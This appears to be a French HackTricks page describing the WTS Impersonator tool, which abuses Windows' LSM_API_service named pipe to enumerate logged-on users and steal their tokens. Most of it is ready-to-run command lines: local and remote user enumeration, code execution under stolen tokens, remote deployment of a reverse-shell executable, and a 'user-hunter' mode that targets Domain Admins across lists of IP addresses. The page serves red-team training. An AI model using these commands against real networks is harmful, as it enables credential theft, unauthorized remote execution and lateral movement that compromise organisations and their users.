tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs au HackTricks et HackTricks Cloud dépôts github.
L'outil WTS Impersonator exploite le "\pipe\LSM_API_service" RPC Named pipe pour énumérer discrètement les utilisateurs connectés et détourner leurs jetons, contournant les techniques traditionnelles d'imitation de jetons. Cette approche facilite des mouvements latéraux sans heurts au sein des réseaux. L'innovation derrière cette technique est attribuée à Omri Baso, dont le travail est accessible sur GitHub.
Fonctionnalité Principale
L'outil fonctionne à travers une séquence d'appels API :
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
Modules Clés et Utilisation
-
Énumération des Utilisateurs : L'énumération des utilisateurs locaux et distants est possible avec l'outil, en utilisant des commandes pour chaque scénario :
-
Localement :
.\WTSImpersonator.exe -m enum
- À distance, en spécifiant une adresse IP ou un nom d'hôte :
.\WTSImpersonator.exe -m enum -s 192.168.40.131
-
Exécution de Commandes : Les modules
exec
etexec-remote
nécessitent un contexte de Service pour fonctionner. L'exécution locale nécessite simplement l'exécutable WTSImpersonator et une commande : -
Exemple d'exécution de commande locale :
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- PsExec64.exe peut être utilisé pour obtenir un contexte de service :
.\PsExec64.exe -accepteula -s cmd.exe
-
Exécution de Commandes à Distance : Implique la création et l'installation d'un service à distance similaire à PsExec.exe, permettant l'exécution avec les permissions appropriées.
-
Exemple d'exécution à distance :
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- Module de Chasse aux Utilisateurs : Cible des utilisateurs spécifiques sur plusieurs machines, exécutant du code sous leurs identifiants. Cela est particulièrement utile pour cibler les Domain Admins ayant des droits d'administrateur local sur plusieurs systèmes.
- Exemple d'utilisation :
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs au HackTricks et HackTricks Cloud dépôts github.